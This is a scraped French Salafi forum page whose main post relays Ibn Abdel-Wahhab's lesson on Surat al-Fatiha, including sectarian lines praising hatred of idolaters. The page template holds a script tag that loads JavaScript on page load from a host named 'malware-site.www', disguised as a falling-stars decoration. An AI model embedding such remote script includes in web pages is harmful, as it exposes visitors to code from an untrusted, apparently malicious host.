ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Septembre 2017

LunMarMerJeuVenSamDim
    123
45678910
11121314151617
18192021222324
252627282930 

Calendrier Calendrier


    leçon tirées de sourate el fatiha Sheikh Muhammad Ibn ‘Abdel-Wahhâb

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    leçon tirées de sourate el fatiha Sheikh Muhammad Ibn ‘Abdel-Wahhâb

    Message par assalafia le Mar 19 Aoû - 19:15

    Quelques profits issus de la sourate al-fatiha

    Sheikh Muhammad Ibn ‘Abdel-Wahhâb

    Dourar Saniyya volume 13 page 73
    [url defaultattr=][/url]
    Au nom d’Allah, le Clément, le Miséricordieux

    « La louange est à Allah, le Seigneur des mondes. Le très miséricordieux, Celui qui fait miséricorde. Le Roi du jour du jugement. »

    Ces trois versets renferment trois thèmes :

    Le premier verset : Il renferme l’amour, car Allah pourvoit de ses grâces, et celui qui obtient cette grâce L’aimera relativement à cette grâce. Et l’amour est de quatre catégories :

    1) L’amour idolâtre : C’est l’amour que dénonça Allah dans le verset : « Parmi les hommes, il en est qui prennent, en dehors d'Allah, des égaux à Lui, en les aimant comme on aime Allah. Or les croyants sont les plus ardents en l'amour d'Allah. Quand les injustes verront le châtiment, ils sauront que la force tout entière est à Allah et qu'Allah est dur en châtiment!... Quand les meneurs désavoueront les suiveurs à la vue du châtiment, les liens entre eux seront bien brisés! Et les suiveurs diront: "Ah! Si un retour nous était possible! Alors nous les désavouerions comme ils nous ont désavoués!" -Ainsi Allah leur montra leurs actions; source de remords pour eux; mais ils ne pourront pas sortir du Feu. » Sourate 2 versets 165 à 167

    2) L’amour du mensonge et des menteurs, et la haine de la vérité et des véridiques : ceci est une caractéristique des hypocrites.

    3) L’amour naturel, c’est l’amour des richesses et des enfants. Tant qu’elle ne détourne pas de l’obéissance d’Allah et n’amène pas à violer Ses interdictions, alors elle est permise.

    4) L’amour des monothéistes et la haine des idolâtres : c’est la plus solide branche de la Foi, et la plus grande adoration qu’un serviteur voue à son Seigneur.

    Le deuxième verset : Il renferme l’espoir.

    Le troisième verset : Il renferme la peur.

    « C’est Toi que nous adorons » : C'est-à-dire : Je t’adore, Ô Seigneur, par ces trois choses ; Par amour de Toi, par espoir en Toi et par peur de Toi.

    Ces trois éléments sont les piliers de l’adoration ; les vouer à un autre qu’Allah est idolâtrie.

    Ces trois versets répliquent ceux qui ne s’attachent qu’à un seul d’entre eux, comme ceux qui ne s’attachent qu’à l’amour, ou ceux qui ne s’attachent qu’à l’espoir, ou ceux qui ne s’attachent qu’à la peur uniquement. Celui qui voue l’une de ces choses à un autre qu’Allah est un idolâtre.

    Nous pouvons donc apprendre de ces versets : La réplique contre trois sectes qui se sont attaché à l’une seule de ces choses :

    1) Ceux qui n’adorent Allah que par amour.

    2) Ceux qui n’adorent Allah que par espoir, ce sont les Mourji’a.

    3) Ceux qui n’adorent Allah que par peur, ce sont les Khawârij.

    « C’est Toi que nous adorons, et c’est de Toi que nous implorons l’aide » : renferme l’Unicité d’Allah dans Sa divinité et de la Seigneurie :

    - « C’est Toi que nous adorons » renferme l’Unicité dans la divinité.

    - « Et c’est de Toi que nous implorons l’aide » renferme l’Unicité dans la Seigneurie.

    « Guide-nous dans le droit chemin » : Ce verset est une réplique contre les hérétiques.

    Quant aux deux derniers versets, ils nous apprennent entre autre :

    - Ce que sont les gens ; Allah les a divisés en trois catégories :

    -Ceux qu’il a comblés de bienfaits.

    -Ceux qui encourent la colère.

    -Les égarés.

    Ceux qui encourent la colère sont ceux qui savent la vérité mais ne la pratique pas. Les égarés sont ceux qui pratiquent sans savoir si ce qu’ils pratiquent est la vérité.

    Et même si la raison de la révélation de ce verset fut les juifs et les chrétiens, il concerne toute personne ayant ces caractéristiques.

    Ceux dont la caractéristique est de savoir puis de pratiquer : ce sont eux qui sont comblés de bienfaits.

    Cette sourate nous enseigne aussi :

    1) De se défaire de toute force ou puissance, car c’est Lui qui te comble de bienfaits.

    2) Connaître parfaitement Allah, et Lui contester tout défaut.



    3) Elle apprend à l’homme à se connaître lui-même, ainsi que son Seigneur, car :

    S’il y a un Seigneur, il y a forcément un serviteur.

    S’il y a un adorateur, il y a forcément un Adoré.

    S’il y a un Guide, il y a donc un guidé.

    S’il y a un comblé de bienfaits, il y a forcément Un Donateur de grâces.

    S’il y a celui qui encoure la colère, il y a forcément Celui qui est en colère.

    S’il y a un égaré, il y a forcément Celui qui égare.

    Cette sourate renferme donc la Divinité, la Seigneurie, et conteste tout imperfection à Allah, et elle renferme la définition de l’adoration ainsi que ses piliers.

      La date/heure actuelle est Jeu 21 Sep - 6:28